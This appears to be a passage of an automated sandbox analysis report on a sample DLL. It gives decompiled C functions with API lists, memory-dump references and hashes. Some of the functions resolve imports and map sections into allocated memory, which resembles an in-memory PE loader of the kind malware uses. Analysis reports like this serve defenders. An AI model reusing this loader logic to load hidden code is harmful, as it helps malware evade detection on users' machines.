                                                                                                                                                      • HeapCreate.KERNEL32(00000000,00001000,00000000,1000E9AF,00000001), ref: 1000F7D0
                                                                                                                                                      • HeapDestroy.KERNEL32 ref: 1000F806
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$CreateDestroy
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3296620671-0
                                                                                                                                                      • Opcode ID: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
                                                                                                                                                      • Instruction ID: 42b5b4e525c6d5e648315bcb041ba63a368b68b04be7829f407a1d363953a1d4
                                                                                                                                                      • Opcode Fuzzy Hash: bb46bfd717c190190485aefa14a3cf7dcb62553dd6b93138db4473b6de64172e
                                                                                                                                                      • Instruction Fuzzy Hash: 6FE06D74A14352AAF700EB318C897A936ECFB807D6F20C83DF408C84AAFF648501AA01
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001A960, Relevance: 2.6, APIs: 2, Instructions: 87memoryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 76%
                                                                                                                                                      			E1001A960(void* _a4) {
				void* _v8;
				signed int _v12;
				signed int _v16;
				void* __ebp;
				void* _t49;
				void* _t52;
				intOrPtr _t60;
				void* _t68;
				void* _t70;
				signed int _t76;
				signed int _t87;
				signed int _t93;
				void* _t94;
				void* _t95;
				void* _t96;
				void* _t97;

				_t49 = _a4;
				_v8 = _t49;
				if(_v8 != 0) {
					__eflags =  *(_v8 + 0x10);
					if(__eflags != 0) {
						_t9 =  *_v8 + 0x28; // 0x1ab2068
						_t93 =  *((intOrPtr*)(_v8 + 4)) +  *_t9;
						__eflags = _t93;
						_v12 = _t93;
						_v12( *((intOrPtr*)(_v8 + 4)), 0, 0);
					}
					_push( *((intOrPtr*)(_v8 + 0x30)));
					E1000CA30(_t68, _t94, _t95, __eflags);
					_t97 = _t96 + 4;
					_t70 = _v8;
					__eflags =  *(_t70 + 8);
					if( *(_t70 + 8) == 0) {
						L12:
						_t52 = _v8;
						__eflags =  *(_t52 + 4);
						if( *(_t52 + 4) != 0) {
							 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x20))))( *((intOrPtr*)(_v8 + 4)), 0, 0x8000,  *((intOrPtr*)(_v8 + 0x34))); // executed
						}
						return HeapFree(GetProcessHeap(), 0, _v8);
					} else {
						_v16 = 0;
						while(1) {
							__eflags = _v16 -  *((intOrPtr*)(_v8 + 0xc));
							if(__eflags >= 0) {
								break;
							}
							_t60 =  *((intOrPtr*)(_v8 + 8));
							_t76 = _v16;
							__eflags =  *(_t60 + _t76 * 4);
							if( *(_t60 + _t76 * 4) != 0) {
								 *((intOrPtr*)( *((intOrPtr*)(_v8 + 0x2c))))( *((intOrPtr*)( *((intOrPtr*)(_v8 + 8)) + _v16 * 4)),  *((intOrPtr*)(_v8 + 0x34))); // executed
								_t97 = _t97 + 8;
							}
							_t87 = _v16 + 1;
							__eflags = _t87;
							_v16 = _t87;
						}
						_push( *((intOrPtr*)(_v8 + 8)));
						E1000CA30(_t68, _t94, _t95, __eflags);
						_t97 = _t97 + 4;
						goto L12;
					}
				}
				return _t49;
			}



















                                                                                                                                                      0x1001a966
                                                                                                                                                      0x1001a969
                                                                                                                                                      0x1001a970
                                                                                                                                                      0x1001a97a
                                                                                                                                                      0x1001a97e
                                                                                                                                                      0x1001a98b
                                                                                                                                                      0x1001a98b
                                                                                                                                                      0x1001a98b
                                                                                                                                                      0x1001a98e
                                                                                                                                                      0x1001a99c
                                                                                                                                                      0x1001a99c
                                                                                                                                                      0x1001a9a5
                                                                                                                                                      0x1001a9a6
                                                                                                                                                      0x1001a9ab
                                                                                                                                                      0x1001a9ae
                                                                                                                                                      0x1001a9b1
                                                                                                                                                      0x1001a9b5
                                                                                                                                                      0x1001aa13
                                                                                                                                                      0x1001aa13
                                                                                                                                                      0x1001aa16
                                                                                                                                                      0x1001aa1a
                                                                                                                                                      0x1001aa37
                                                                                                                                                      0x1001aa39
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001a9b7
                                                                                                                                                      0x1001a9b7
                                                                                                                                                      0x1001a9c9
                                                                                                                                                      0x1001a9cf
                                                                                                                                                      0x1001a9d2
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001a9d7
                                                                                                                                                      0x1001a9da
                                                                                                                                                      0x1001a9dd
                                                                                                                                                      0x1001a9e1
                                                                                                                                                      0x1001a9fd
                                                                                                                                                      0x1001a9ff
                                                                                                                                                      0x1001a9ff
                                                                                                                                                      0x1001a9c3
                                                                                                                                                      0x1001a9c3
                                                                                                                                                      0x1001a9c6
                                                                                                                                                      0x1001a9c6
                                                                                                                                                      0x1001aa0a
                                                                                                                                                      0x1001aa0b
                                                                                                                                                      0x1001aa10
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001aa10
                                                                                                                                                      0x1001a9b5
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,?,1001BA3C), ref: 1001AA42
                                                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,1001BA3C), ref: 1001AA49
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3859560861-0
                                                                                                                                                      • Opcode ID: 8344b44aa3b996ba87edac19bfe790ed22b92f5b474006bbf66f3f19f758ea60
                                                                                                                                                      • Instruction ID: 4d02d4e2172aadf48441733df7480d9fc57cbb1c8efede5bdbb7e0f8d5fbe0c0
                                                                                                                                                      • Opcode Fuzzy Hash: 8344b44aa3b996ba87edac19bfe790ed22b92f5b474006bbf66f3f19f758ea60
                                                                                                                                                      • Instruction Fuzzy Hash: B431A178A00108EFDB04DF94CA94AADB7B6FF89304F248198E9055B395C775EE85DB81
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001ABA3, Relevance: 2.5, APIs: 2, Instructions: 34COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 34%
                                                                                                                                                      			E1001ABA3() {
				signed int _t93;
				intOrPtr _t97;
				signed int _t99;
				signed int _t106;
				signed int _t114;
				void* _t116;
				void* _t121;
				void* _t127;
				signed int _t173;
				void* _t180;
				void* _t181;
				void* _t182;
				void* _t184;
				void* _t186;
				void* _t187;

				L0:
				while(1) {
					L0:
					 *(_t182 - 4) =  *(_t182 - 4) + 0x14;
					if(IsBadReadPtr( *(_t182 - 4), 0x14) != 0 ||  *((intOrPtr*)( *(_t182 - 4) + 0xc)) == 0) {
						break;
					}
					L3:
					_t7 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
					_t12 =  *((intOrPtr*)(_t182 + 8)) + 0x24; // 0xf3c7e850, executed
					_t97 =  *((intOrPtr*)( *_t12))( *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0xc)),  *_t7); // executed
					_t186 = _t184 + 8;
					 *((intOrPtr*)(_t182 - 0x20)) = _t97;
					if( *((intOrPtr*)(_t182 - 0x20)) != 0) {
						L5:
						_t17 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
						_push(4 +  *_t17 * 4);
						_t21 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
						_push( *_t21);
						_t99 = E1000E018(_t127,  *_t21, _t180, _t181, __eflags);
						_t187 = _t186 + 8;
						 *(_t182 - 0x18) = _t99;
						__eflags =  *(_t182 - 0x18);
						if( *(_t182 - 0x18) != 0) {
							L7:
							 *( *((intOrPtr*)(_t182 + 8)) + 8) =  *(_t182 - 0x18);
							_t34 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
							_t36 =  *((intOrPtr*)(_t182 + 8)) + 8; // 0x98
							 *((intOrPtr*)( *_t36 +  *_t34 * 4)) =  *((intOrPtr*)(_t182 - 0x20));
							_t41 =  *((intOrPtr*)(_t182 + 8)) + 0xc; // 0x52b8558b
							 *( *((intOrPtr*)(_t182 + 8)) + 0xc) =  *_t41 + 1;
							__eflags =  *( *(_t182 - 4));
							if( *( *(_t182 - 4)) == 0) {
								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
								_t106 =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
								__eflags = _t106;
								 *(_t182 - 0x14) = _t106;
							} else {
								 *(_t182 - 0x1c) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 4));
								 *(_t182 - 0x14) =  *((intOrPtr*)(_t182 - 0x10)) +  *((intOrPtr*)( *(_t182 - 4) + 0x10));
							}
							while(1) {
								L12:
								__eflags =  *( *(_t182 - 0x1c));
								if( *( *(_t182 - 0x1c)) == 0) {
									break;
								}
								L13:
								__eflags =  *( *(_t182 - 0x1c)) & 0x80000000;
								if(( *( *(_t182 - 0x1c)) & 0x80000000) == 0) {
									 *((intOrPtr*)(_t182 - 0x24)) =  *((intOrPtr*)(_t182 - 0x10)) +  *( *(_t182 - 0x1c));
									_t77 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
									_t114 =  *((intOrPtr*)(_t182 - 0x24)) + 2;
									__eflags = _t114;
									_t81 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
									_t116 =  *((intOrPtr*)( *_t81))( *((intOrPtr*)(_t182 - 0x20)), _t114,  *_t77);
									_t187 = _t187 + 0xc;
									 *( *(_t182 - 0x14)) = _t116;
								} else {
									_t67 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
									_t71 =  *((intOrPtr*)(_t182 + 8)) + 0x28; // 0xc483ffff
									_t121 =  *((intOrPtr*)( *_t71))( *((intOrPtr*)(_t182 - 0x20)),  *( *(_t182 - 0x1c)) & 0x0000ffff,  *_t67);
									_t187 = _t187 + 0xc;
									 *( *(_t182 - 0x14)) = _t121;
								}
								L16:
								__eflags =  *( *(_t182 - 0x14));
								if( *( *(_t182 - 0x14)) != 0) {
									L18:
									L11:
									 *(_t182 - 0x1c) =  &(( *(_t182 - 0x1c))[1]);
									_t173 =  *(_t182 - 0x14) + 4;
									__eflags = _t173;
									 *(_t182 - 0x14) = _t173;
									continue;
								} else {
									L17:
									 *(_t182 - 0xc) = 0;
								}
								break;
							}
							L19:
							__eflags =  *(_t182 - 0xc);
							if(__eflags != 0) {
								L21:
								continue;
							} else {
								L20:
								_t87 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
								_t90 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
								 *((intOrPtr*)( *_t90))( *((intOrPtr*)(_t182 - 0x20)),  *_t87);
								SetLastError(0x7f);
							}
						} else {
							L6:
							_t25 =  *((intOrPtr*)(_t182 + 8)) + 0x34; // 0x118bb84d
							_t28 =  *((intOrPtr*)(_t182 + 8)) + 0x2c; // 0x75c08504
							 *((intOrPtr*)( *_t28))( *((intOrPtr*)(_t182 - 0x20)),  *_t25);
							SetLastError(0xe);
							 *(_t182 - 0xc) = 0;
						}
					} else {
						L4:
						SetLastError(0x7e);
						 *(_t182 - 0xc) = 0;
					}
					break;
				}
				L22:
				_t93 =  *(_t182 - 0xc);
				return _t93;
			}


















                                                                                                                                                      0x1001aba3
                                                                                                                                                      0x1001aba3
                                                                                                                                                      0x1001aba3
                                                                                                                                                      0x1001aba9
                                                                                                                                                      0x1001abba
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001abcd
                                                                                                                                                      0x1001abd0
                                                                                                                                                      0x1001abe1
                                                                                                                                                      0x1001abe4
                                                                                                                                                      0x1001abe6
                                                                                                                                                      0x1001abe9
                                                                                                                                                      0x1001abf0
                                                                                                                                                      0x1001ac06
                                                                                                                                                      0x1001ac09
                                                                                                                                                      0x1001ac13
                                                                                                                                                      0x1001ac17
                                                                                                                                                      0x1001ac1a
                                                                                                                                                      0x1001ac1b
                                                                                                                                                      0x1001ac20
                                                                                                                                                      0x1001ac23
                                                                                                                                                      0x1001ac26
                                                                                                                                                      0x1001ac2a
                                                                                                                                                      0x1001ac56
                                                                                                                                                      0x1001ac5c
                                                                                                                                                      0x1001ac62
                                                                                                                                                      0x1001ac68
                                                                                                                                                      0x1001ac6e
                                                                                                                                                      0x1001ac74
                                                                                                                                                      0x1001ac7d
                                                                                                                                                      0x1001ac83
                                                                                                                                                      0x1001ac86
                                                                                                                                                      0x1001acaa
                                                                                                                                                      0x1001acb3
                                                                                                                                                      0x1001acb3
                                                                                                                                                      0x1001acb6
                                                                                                                                                      0x1001ac88
                                                                                                                                                      0x1001ac90
                                                                                                                                                      0x1001ac9c
                                                                                                                                                      0x1001ac9c
                                                                                                                                                      0x1001accd
                                                                                                                                                      0x1001accd
                                                                                                                                                      0x1001acd0
                                                                                                                                                      0x1001acd3
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001acd5
                                                                                                                                                      0x1001acda
                                                                                                                                                      0x1001ace0
                                                                                                                                                      0x1001ad12
                                                                                                                                                      0x1001ad18
                                                                                                                                                      0x1001ad1f
                                                                                                                                                      0x1001ad1f
                                                                                                                                                      0x1001ad2a
                                                                                                                                                      0x1001ad2d
                                                                                                                                                      0x1001ad2f
                                                                                                                                                      0x1001ad35
                                                                                                                                                      0x1001ace2
                                                                                                                                                      0x1001ace5
                                                                                                                                                      0x1001acfb
                                                                                                                                                      0x1001acfe
                                                                                                                                                      0x1001ad00
                                                                                                                                                      0x1001ad06
                                                                                                                                                      0x1001ad06
                                                                                                                                                      0x1001ad37
                                                                                                                                                      0x1001ad3a
                                                                                                                                                      0x1001ad3d
                                                                                                                                                      0x1001ad48
                                                                                                                                                      0x1001acbb
                                                                                                                                                      0x1001acc1
                                                                                                                                                      0x1001acc7
                                                                                                                                                      0x1001acc7
                                                                                                                                                      0x1001acca
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ad3f
                                                                                                                                                      0x1001ad3f
                                                                                                                                                      0x1001ad3f
                                                                                                                                                      0x1001ad3f
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ad3d
                                                                                                                                                      0x1001ad4d
                                                                                                                                                      0x1001ad4d
                                                                                                                                                      0x1001ad51
                                                                                                                                                      0x1001ad73
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ad53
                                                                                                                                                      0x1001ad53
                                                                                                                                                      0x1001ad56
                                                                                                                                                      0x1001ad61
                                                                                                                                                      0x1001ad64
                                                                                                                                                      0x1001ad6b
                                                                                                                                                      0x1001ad6b
                                                                                                                                                      0x1001ac2c
                                                                                                                                                      0x1001ac2c
                                                                                                                                                      0x1001ac2f
                                                                                                                                                      0x1001ac3a
                                                                                                                                                      0x1001ac3d
                                                                                                                                                      0x1001ac44
                                                                                                                                                      0x1001ac4a
                                                                                                                                                      0x1001ac4a
                                                                                                                                                      0x1001abf2
                                                                                                                                                      0x1001abf2
                                                                                                                                                      0x1001abf4
                                                                                                                                                      0x1001abfa
                                                                                                                                                      0x1001abfa
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001abf0
                                                                                                                                                      0x1001ad78
                                                                                                                                                      0x1001ad78
                                                                                                                                                      0x1001ad7e

                                                                                                                                                      APIs
                                                                                                                                                      • IsBadReadPtr.KERNEL32(00000000,00000014), ref: 1001ABB2
                                                                                                                                                      • SetLastError.KERNEL32(0000007E), ref: 1001ABF4
                                                                                                                                                      • _realloc.LIBCMT ref: 1001AC1B
                                                                                                                                                      • SetLastError.KERNEL32(0000000E), ref: 1001AC44
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: ErrorLast$Read_realloc
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 252108943-0
                                                                                                                                                      • Opcode ID: c384f3d36efca167a9077d51d7c2b1bb8180d2edbecdb5a4fc9a0d208bb5e22f
                                                                                                                                                      • Instruction ID: fc8650bffc04b339d430b1508d1055308318352e03b6944bc6f0970fdcc69cd6
                                                                                                                                                      • Opcode Fuzzy Hash: c384f3d36efca167a9077d51d7c2b1bb8180d2edbecdb5a4fc9a0d208bb5e22f
                                                                                                                                                      • Instruction Fuzzy Hash: B501EF74A00208EFDB04CF94C985B9DB7B1FF49359F608198E90AAB350C378EA81DB60
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001B300, Relevance: 1.6, APIs: 1, Instructions: 126COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 50%
                                                                                                                                                      			E1001B300(void* __ebx, void* __edi, void* __esi, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
				intOrPtr _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr _v24;
				void* _t78;
				intOrPtr _t82;
				intOrPtr _t95;
				void* _t100;
				void* _t140;
				void* _t141;
				void* _t142;
				void* _t143;
				void* _t144;
				void* _t145;

				_t141 = __esi;
				_t140 = __edi;
				_t100 = __ebx;
				_t2 = _a16 + 4; // 0xe90575c0
				_v20 =  *_t2;
				_t6 =  *_a16 + 0x14; // 0x2b34508b
				_t8 = ( *_t6 & 0x0000ffff) + 0x18; // 0x1001b95d
				_v24 =  *_a16 + _t8;
				_v8 = 0;
				while(1) {
					_t16 =  *_a16 + 6; // 0xe2e905
					if(_v8 >= ( *_t16 & 0x0000ffff)) {
						break;
					}
					if( *((intOrPtr*)(_v24 + 0x10)) != 0) {
						_t44 = _v24 + 0x14; // 0x2b34508b
						_t46 = _v24 + 0x10; // 0xb04d8b02
						_t78 = E1001AE40(_a8,  *_t44 +  *_t46);
						_t143 = _t142 + 8;
						if(_t78 != 0) {
							_t49 = _a16 + 0x34; // 0x8b0aeb18
							_t51 = _v24 + 0x10; // 0xb04d8b02
							_t54 = _v24 + 0xc; // 0x8bb8558b
							_t56 = _a16 + 0x1c; // 0x8b1874b4, executed
							_t82 =  *((intOrPtr*)( *_t56))(_v20 +  *_t54,  *_t51, 0x1000, 4,  *_t49); // executed
							_t144 = _t143 + 0x14;
							_v12 = _t82;
							if(_v12 != 0) {
								_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
								E1000D190(_t100, _t140, _t141, _v12, _a4 +  *((intOrPtr*)(_v24 + 0x14)),  *((intOrPtr*)(_v24 + 0x10)));
								_t142 = _t144 + 0xc;
								 *((intOrPtr*)(_v24 + 8)) = _v12;
								L1:
								_v8 = _v8 + 1;
								_v24 = _v24 + 0x28;
								continue;
							}
							return 0;
						}
						return 0;
					}
					_v16 =  *((intOrPtr*)(_a12 + 0x38));
					if(_v16 <= 0) {
						L8:
						goto L1;
					}
					_t25 = _a16 + 0x34; // 0x8b0aeb18
					_t29 = _v24 + 0xc; // 0x8bb8558b
					_t31 = _a16 + 0x1c; // 0x8b1874b4
					_t95 =  *((intOrPtr*)( *_t31))(_v20 +  *_t29, _v16, 0x1000, 4,  *_t25);
					_t145 = _t142 + 0x14;
					_v12 = _t95;
					if(_v12 != 0) {
						_v12 = _v20 +  *((intOrPtr*)(_v24 + 0xc));
						 *((intOrPtr*)(_v24 + 8)) = _v12;
						E1000CF20(_t140, _v12, 0, _v16);
						_t142 = _t145 + 0xc;
						goto L8;
					}
					return 0;
				}
				return 1;
			}


















                                                                                                                                                      0x1001b300
                                                                                                                                                      0x1001b300
                                                                                                                                                      0x1001b300
                                                                                                                                                      0x1001b309
                                                                                                                                                      0x1001b30c
                                                                                                                                                      0x1001b319
                                                                                                                                                      0x1001b31d
                                                                                                                                                      0x1001b321
                                                                                                                                                      0x1001b324
                                                                                                                                                      0x1001b33f
                                                                                                                                                      0x1001b344
                                                                                                                                                      0x1001b34b
                                                                                                                                                      0x00000000
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b358
                                                                                                                                                      0x1001b3cf
                                                                                                                                                      0x1001b3d5
                                                                                                                                                      0x1001b3dd
                                                                                                                                                      0x1001b3e2
                                                                                                                                                      0x1001b3e7
                                                                                                                                                      0x1001b3f0
                                                                                                                                                      0x1001b3fe
                                                                                                                                                      0x1001b408
                                                                                                                                                      0x1001b40f
                                                                                                                                                      0x1001b412
                                                                                                                                                      0x1001b414
                                                                                                                                                      0x1001b417
                                                                                                                                                      0x1001b41e
                                                                                                                                                      0x1001b42d
                                                                                                                                                      0x1001b445
                                                                                                                                                      0x1001b44a
                                                                                                                                                      0x1001b453
                                                                                                                                                      0x1001b32d
                                                                                                                                                      0x1001b333
                                                                                                                                                      0x1001b33c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b33c
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b420
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b3e9
                                                                                                                                                      0x1001b360
                                                                                                                                                      0x1001b367
                                                                                                                                                      0x1001b3c7
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b3c7
                                                                                                                                                      0x1001b36c
                                                                                                                                                      0x1001b381
                                                                                                                                                      0x1001b388
                                                                                                                                                      0x1001b38b
                                                                                                                                                      0x1001b38d
                                                                                                                                                      0x1001b390
                                                                                                                                                      0x1001b397
                                                                                                                                                      0x1001b3a9
                                                                                                                                                      0x1001b3b2
                                                                                                                                                      0x1001b3bf
                                                                                                                                                      0x1001b3c4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b3c4
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001b399
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: _memset
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 2102423945-0
                                                                                                                                                      • Opcode ID: 0e4b15c6f8be2774af6517acaf1e6a5dc7f042fe7413adddbf46ab36f13a78d9
                                                                                                                                                      • Instruction ID: a005275a1ccb32e2261c4421282f910c29d49b3246cd882dcb7603a91dee7caf
                                                                                                                                                      • Opcode Fuzzy Hash: 0e4b15c6f8be2774af6517acaf1e6a5dc7f042fe7413adddbf46ab36f13a78d9
                                                                                                                                                      • Instruction Fuzzy Hash: 7951A7B4A0010ADFCB04DF94D991EAEB7B5FF48304F248599E915AB346D730EE91CBA1
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001AAF0, Relevance: 1.5, APIs: 1, Instructions: 15libraryCOMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001AAF0(void* __ecx, CHAR* _a4) {
				struct HINSTANCE__* _v8;
				struct HINSTANCE__* _t6;

				_t6 = LoadLibraryA(_a4); // executed
				_v8 = _t6;
				if(_v8 != 0) {
					return _v8;
				}
				return 0;
			}





                                                                                                                                                      0x1001aaf8
                                                                                                                                                      0x1001aafe
                                                                                                                                                      0x1001ab05
                                                                                                                                                      0x00000000
                                                                                                                                                      0x1001ab0b
                                                                                                                                                      0x00000000

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: LibraryLoad
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 1029625771-0
                                                                                                                                                      • Opcode ID: c04995fa923df692f8169a9dfa8ba67c198ed432f40ad320a19afe33b55cab92
                                                                                                                                                      • Instruction ID: 175513b2d3b99921c95d5b3868ca5ca2b884793c4c363252687910afe3f21655
                                                                                                                                                      • Opcode Fuzzy Hash: c04995fa923df692f8169a9dfa8ba67c198ed432f40ad320a19afe33b55cab92
                                                                                                                                                      • Instruction Fuzzy Hash: 4CD0927490924CEBCB10DFA4DA88A8EB7F8EB09251F208595FC0997201D631DE809AA0
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1001AAC0, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 100%
                                                                                                                                                      			E1001AAC0(struct HINSTANCE__* _a4) {
				int _t3;

				_t3 = FreeLibrary(_a4); // executed
				return _t3;
			}




                                                                                                                                                      0x1001aac7
                                                                                                                                                      0x1001aace

                                                                                                                                                      APIs
                                                                                                                                                      Memory Dump Source
                                                                                                                                                      • Source File: 00000002.00000002.418199354.0000000010001000.00000020.00000001.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                      • Associated: 00000002.00000002.418193488.0000000010000000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418216949.0000000010023000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418526635.0000000010332000.00000004.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418534419.0000000010337000.00000002.00000001.sdmp Download File
                                                                                                                                                      • Associated: 00000002.00000002.418540972.0000000010338000.00000004.00000001.sdmp Download File
                                                                                                                                                      Similarity
                                                                                                                                                      • API ID: FreeLibrary
                                                                                                                                                      • String ID:
                                                                                                                                                      • API String ID: 3664257935-0
                                                                                                                                                      • Opcode ID: 943a5e761fb49f706bd806fa478419eb7e3c1528e20f65d3e9a3f78506bcc702
                                                                                                                                                      • Instruction ID: d41d78d4d80a0482e50fbcd51c543f3b4bec57f301915c91e4edb7b1fe7fc2cd
                                                                                                                                                      • Opcode Fuzzy Hash: 943a5e761fb49f706bd806fa478419eb7e3c1528e20f65d3e9a3f78506bcc702
                                                                                                                                                      • Instruction Fuzzy Hash: E3B0123100030CBBCE005BD8E8888C53B9C96085117004000F60C83100C630F44046E4
                                                                                                                                                      Uniqueness

                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                      Function 1000EBD1, Relevance: 1.5, APIs: 1, Instructions: 7COMMON
                                                                                                                                                      Download Yara Rule
                                                                                                                                                      C-Code - Quality: 68%
                                                                                                                                                      			E1000EBD1(void* __ebx, void* __edi, void* __esi, void* __ebp, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t5;
				void* _t13;

				E10015254();
				_push(_a4);
				_t5 = L1000EAD4(__ebx, _a12, _a8, __edi, __esi, _t13); // executed
				return _t5;
			}





                                                                                                                                                      0x1000ebd1
